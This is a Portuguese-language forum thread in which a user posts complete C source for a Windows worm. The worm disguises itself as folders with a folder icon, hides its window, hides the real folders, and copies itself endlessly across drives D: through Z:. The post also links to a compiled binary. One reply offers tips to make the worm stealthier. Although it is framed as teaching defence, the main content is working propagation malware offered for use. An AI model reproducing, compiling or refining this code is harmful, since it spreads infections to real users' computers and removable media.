Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Source, exemplo de virus

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    C / C++ Source, exemplo de virus

    A melhor forma de se defender de um inimigo é saber como ele age, por isso decidi mostrar uma das formas que um vírus usa pra enganar e ser executado.
    o código abaixo deve ser compilado com um ícone de pasta,ele fazia parte de um vírus que eu criei,por razões obvias retirei os códigos que causam danos ao pc.
    Cuidado, só execute em uma maquina virtual. mas caso tenha se infectado por ele, reinicie o computador e baixe esse arquivo: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ele remove as cópias desse e outros vírus.
    o programa já compilado o código e o ícone de pasta pode ser baixado nesse link: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ,a senha é "Darkware_@hotmail.com" sem aspas.
    Código:
                                               
     /* Criado por Darkware */
                                               
     /* Compilador Dev-c++ 4.9.9.2 */
    #include <stdio.h>
#include <stdlib.h>
#include <io.h> /*para usar a estrutura _finddata_t*/
#include <windows.h>
#include <string.h>
typedef struct _finddata_t proq;/*struct para procurar arquivos*/
proq arquivo;
FILE *fp;/*ponteiro para arquivo*/
long int handle,tam,tam2;
char arqui[500],lugar[500],nomepast[200],comando[200],*nomedoarq;
void infect();/*prototipos das funções*/
void start();
void ocult();
void infectdir();
int main(int argc, char *argv[])
{
ocult();/*função para ocultar a janela*/
nomedoarq = strrchr(argv[0],'\\')+1;/*pegar o nome do arquivo que esta sendo executado*/
start();/*abrir pasta*/
strcat(arqui,argv[0]);/*copiar o diretorio do arquivo para a string arqui*/
infect();/*função para infectar o diretorio atual*/
infectdir();/*função para incfectar todos os discos*/
}
void ocult()
{
ShowWindow(GetForegroundWindow(),SW_HIDE);/*comando para ocultar janela*/
}
void start()
{
tam=strlen(nomedoarq);
tam2=tam-4;
for(tam=0;tam != tam2;tam++)
{
    nomepast[tam] = nomedoarq[tam];
}
sprintf(comando,"explorer %s",nomepast);
system(comando);
}
void infect()
{
    handle=_findfirst("*.",&arquivo);/*procura as pastas*/
do
{
strcpy(lugar,arquivo.name);
strcat(lugar,".exe");
fp=fopen(lugar,"rb");/*verificase o arquivo ja existe*/
if(!fp)/*se não existir, cria uma cópia do virus*/
{
CopyFile (arqui,lugar,0);
SetFileAttributes(arquivo.name,FILE_ATTRIBUTE_HIDDEN);
}
else
fclose(fp);
}while(_findnext(handle,&arquivo)==0);
DeleteFile("..exe");
DeleteFile("...exe");
DeleteFile("..exe.exe");
DeleteFile("...exe.exe");
_findclose(handle);
}
void infectdir()
{
    while(1)
    {
        chdir("D:\\");
        infect();
        chdir("E:\\");
        infect();
        chdir("F:\\");
        infect();
        chdir("G:\\");
        infect();
        chdir("H:\\");
        infect();
        chdir("I:\\");
        infect();
        chdir("J:\\");
        infect();
        chdir("K:\\");
        infect();
        chdir("L:\\");
        infect();
        chdir("M:\\");
        infect();
        chdir("N:\\");
        infect();
        chdir("O:\\");
        infect();
        chdir("P:\\");
        infect();
        chdir("Q:\\");
        infect();
        chdir("R:\\");
        infect();
        chdir("S:\\");
        infect();
        chdir("T:\\");
        infect();
        chdir("U:\\");
        infect();
        chdir("V:\\");
        infect();
        chdir("W:\\");
        infect();
        chdir("X:\\");
        infect();
        chdir("Y:\\");
        infect();
        chdir("Z:\\");
        infect();
    }
}
    Quando você pensar que está realmente sozinho, sinta os olhos de alguém o observando.
    Similar Threads
    Tags: codigo, fonte, source, virus
    • Top
  • Font Size
    #2
    Parabéns amigo ajudara muitas pessoas, isso dará uma noção

    Mais só lembrando:

    Cada vírus tem a sua finalidade e seu método de ser executado.

    dicas básica para não pega vírus.

    1 - nunca abrir link enviado por e-mail. (independente do que estiver escrito ao não ser que o cara te liga dizendo: vou manda um e-mail com um link.) MESMO ASIM NÃO EBRE... KKKKKK

    2 - sempre que baixa algum programa de fontes não confiável e recomentado que verifique o tamanho do arquivo,nome,dados da empresa etc. (lembrando que um cracker bom fara tudo isso todos esses dados podem ser colocado por ele ainda mais se ele camuflar o vírus no programa verdadeiro a diferença e que o programa fica um pouquinho maior. agora um lammer não saberá fazer um trabalho bem feito o máximo que saberá e troca o incone e deixa o virus indetectável por um crypter e provavelmente que nem sabe junta 2 arquivos executado no windows provavelmente usará um blinder. voltando o assunto.

    Tem um programinha que ajudara muito vocês nessas horas: PE Detective
    • Top

    Comment

    • Font Size
      #3
      Obrigado por compartilhar...
      • Top

      Comment

      • Font Size
        #4
        É deveras interessante, parabéns.

        Não dei uma olhada por completo, mas vou dar algumas sugestões:
        • Idente o código, pois está muito ilegível
        • Use o comando -mwindows na linha de comandos do GCC para deixar a consola invisível, pois a janela do seu programa irá piscar na tela com o método que usou
        • Você fez muito POG, mas irei mostrar, depois, pois estou à analisar ainda o código


        Por enquanto só isso, não tenho aqui o Windows ou uma máquina virtual pra testar.
        Abraços.
        • Top

        Comment

        Anterior template Avançar
        X
        Working...
        X